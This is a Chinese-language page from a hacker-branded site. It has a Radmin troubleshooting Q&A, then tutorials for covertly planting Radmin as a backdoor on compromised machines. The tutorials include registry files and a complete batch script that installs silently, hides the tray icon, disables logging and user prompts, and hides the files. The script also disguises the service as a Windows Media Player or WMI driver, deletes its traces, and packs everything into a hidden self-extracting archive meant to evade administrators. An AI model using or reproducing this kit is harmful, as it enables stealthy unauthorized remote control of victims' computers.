- Rongsen.Com.Cn 版权所有 2008-2010 京ICP备08007000号 京公海网安备11010802026356号 朝阳网安编号:110105199号
- 北京黑客防线网安工作室-黑客防线网安服务器维护基地为您提供专业的
服务器维护
,企业网站维护
,网站维护
服务 - (建议采用1024×768分辨率,以达到最佳视觉效果) Powered by 黑客防线网安 ©2009-2010 www.rongsen.com.cn
作者:黑客防线网安网站维护基地 来源:黑客防线网安网站维护基地 浏览次数:0 |
我用radmin,就是我可以看到他的桌面,但是用radmin的远程telnet就不能过去,直接用teleet就可以过去,还有一个就是怎么查看别人用radmin连接,我连别人嘛,扫到一个4899的空口令,我看他桌面就发现他正在看我的IP呢?
答:Radmin 是最快的远程控制软件。它为低带宽的连接(如通过Modem)进行了专门的优化。通过Modem连接时,屏幕刷新次数可以达到每秒5-10次。如果通过局域网连接,速度可以达到每秒100次,使你如同在本地一样进行实时操作。Radmin由Server和Client两部分组成。Server运行在被监控和管理的远程计算机上,它将该机的屏幕和键盘、鼠标控制交给在另一台计算机上的Client来控制
Client又称Viewer,运行在你的计算机上对远程的计算机进行控制
在Server和Client之间要求具有基于TCP/IP的连接。
用radmin的远程telnet就不能过去原因:
首先检查是否能连接到远程计算机:ping 10.0.0.1
或者:ping 服务器域名
检查radmin server是否在正常运行。
检查相关的端口是否设置正确。
检查在远程计算机上是否有防火墙在工作。如果有防火墙,需要打开相应端口。
检查在远程计算机上是否设置了IP Filter,如果有,检查是否包括了本机的IP。
在Windows XP中,如果在服务器端设置了本机防火墙(网络连接- 属性- 高级),将无法建立连接。因此,需要打开相关端口(4899)或取消防火墙。
查看本机IP的方式:
可以使用以下任一种方式:
可以使用ipconfig命令:开始 – 运行 – 输入命令cmd – 在命令行窗口输入命令ipconfig,即可查看本机IP。
在Windows窗口的右下角工具条中会出现一个Radmin Server的图标,当鼠标在该图标上移动时,会显示出本机的IP。
关于 radmin 的远程安装教程
介绍 radmin 之前先说一下它的好处。我们平常所用的远程共用一个桌面的服务软件有DameWare NT ,VNC , Pcanywhere , Remote administrator 等。 DameWare 我感觉已经被淘汰了, 它的缺点太多,例如要依赖IPC$,日志记录等等。Pcanywhere 我没有研究过。VNC 最大的特点是跨平台,但缺点是隐藏图标的问题,我不会编程,当然无法去除图标,还有就是 VNC 功能很少。radmin 就不同了,它的特色有:速度快隐藏图标,COPY文件,telnet 等功能。安装也及其简单:
首先要在自己的机子上安装,在设置完端口,密码,隐藏图标后,从注册表导出
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin 起名为radmin.reg
内容大概如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"Port"=hex:64,19,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:c7,04,0d,72,74,b5,cb,03,f6,46,8e,ee,64,52,72,7b
解释一下 "DisableTrayIcon"=hex:01,00,00,00 里的01表示隐藏图标,改成00,图标就会显示 。"Port"=hex:当然是端口,这里是6500。 "Parameter"=hex:是密码。
其他的就不用管了。
现在我们将
AdmDll.dll
raddrv.dll
r_server.exe
radmin.reg
telnet 到肉鸡c:\winnt\system32\上执行:
regedit /s radmin.reg
r_server /install
net start r_server
马上连接即可,速度还不错。并且它还自带了ftp和telnet,在实际中有很大用处
RAdmin 服务端最新高级配置
我中意它。。没有办法 给大家说说我平时的radmin服务端嘀配置
为了方便安装。我们制作一个rar自解程序。你们应该会吧。。
我们建一个bat文件,内容如下:
net stop r_server
保存为1.bat文件。作用:以防万一
在建一个bat,内容如下:
@echo off
@system.exe /uninstall /silence
@system.exe /install /silence
echo Windows Registry Editor Version 5.00 > c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]>>
c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]>>
c:\server.reg
echo "NTAuthEnabled"=hex:00,00,00,00>> c:\server.reg
echo
"Parameter"=hex:d8,50,b3,36,7e,c0,dd,79,ce,7e,dd,f2,11,6d,1f,f7>>
c:\server.reg
echo "Port"=hex:7a,00,00,00>> c:\server.reg
echo "Timeout"=hex:0a,00,00,00>> c:\server.reg
echo "EnableLogFile"=hex:00,00,00,00>> c:\server.reg
echo "LogFilePath"="c:\\logfile.txt">> c:\server.reg
echo "FilterIp"=hex:00,00,00,00>> c:\server.reg
echo "DisableTrayIcon"=hex:01,00,00,00>> c:\server.reg
echo "AutoAllow"=hex:00,00,00,00>> c:\server.reg
echo "AskUser"=hex:00,00,00,00>> c:\server.reg
echo "EnableEventLog"=hex:00,00,00,00>> c:\server.reg>> c:\server.reg
@regedit /s c:\server.reg
@net start r_server
@attrib +r +h %systemroot%\system32\drivers\system.exe
@attrib +r +h %systemroot%\system32\drivers\admdll.dll
@attrib +r +h %systemroot%\system32\drivers\raddrv.dll
echo Windows Registry Editor Version 5.00 > c:\ip.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server] >>
c:\ip.reg
echo "Description"="为Windows Media Player提供加载进程及为其他的移动
媒体,驱动程序和库提供基层安全协议服务。">> c:\ip.reg
@regedit /s c:\ip.reg
@del c:\ip.reg /f /q
@del c:\server.reg /f /q
@sc config r_server displayname= "Windows Management Instrumentation
Player Drivers"
@del %systemroot%\system32\haha.exe /f /q
@del %systemroot%\system32\drivers\sc.exe /f /q
@del %systemroot%\system32\drivers\1.bat /f /q
@del %systemroot%\system32\drivers\2.bat /f /q
保存为2.bat文件 ,文件。。。。实际应用中注意:
1."Port"=hex:7a,00,00,00,换成你的radmin中reg文件中的相应内容,这个是
端口
2."Parameter"=hex:d8,50,b3,36,7e,c0,dd,79,ce,7e,dd,f2,11,6d,1f,f7这个
是密码。。换成相应的即可
3.其他默认,大家应该知道了。。我没有使用注册表,而是bat,原因(1.我喜
欢bat,嘿嘿。。。)
4.配置RAR高级自解压缩选项嘀时候。。注意那个解压路径 写成%systemroot%
\system32\drivers这个
步骤1 选择『在当前文件夹中创建』
步骤2 在『解压后运行』输入2.bat
步骤3 在『解压前运行』输入1.bat
步骤4 选择RAR高级自解压缩中的『模式』 改两个地方 选择『全部隐藏』和『
覆盖所有文件』
5.把你的r_server改名成system
6.RAR打包的时候不要忘记了SC这个程序
在上面我使用到了几个隐藏技巧。。
1.使用了attrib命令
2.利用注册表中的服务说明。。就是下面这一段
echo Windows Registry Editor Version 5.00 > c:\ip.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server] >>
c:\ip.reg
echo "Description"="为Windows Media Player提供加载进程及为其他的移动
媒体,驱动程序和库提供基层安全协议服务。">> c:\ip.reg
@regedit /s c:\ip.reg
@del c:\ip.reg /f /q
大家应该可以看懂
3.使用SC改变了r_server服务名
@sc config r_server displayname= "Windows Management Instrumentation
Player Drivers"
有了以上的几步。。很多管理员都不会查出来。。当然普通人更不会了
大家选择一个好的端口就行了。。。如果要替换服务。。自己加几个命令在
2.bat中就是了。。
优点:
1.在 系统服务 中看见的是Windows Management Instrumentation Player
Drivers 服务 (可以自定义)
2.服务说明是 提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全
协议服务
3.在cmd下面 使用net start 看见的自起动服务是Windows Management
Instrumentation Player Drivers
4.在进程中看见的是system(可以自定义,在2.bat文件中相应的地方改一下,
注意不要和已有的系统进程起冲突)
以上的程序。。SC,还有经过处理的RAdmin的服务端
我要申请本站:N点 | 黑客防线官网 | |
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479 |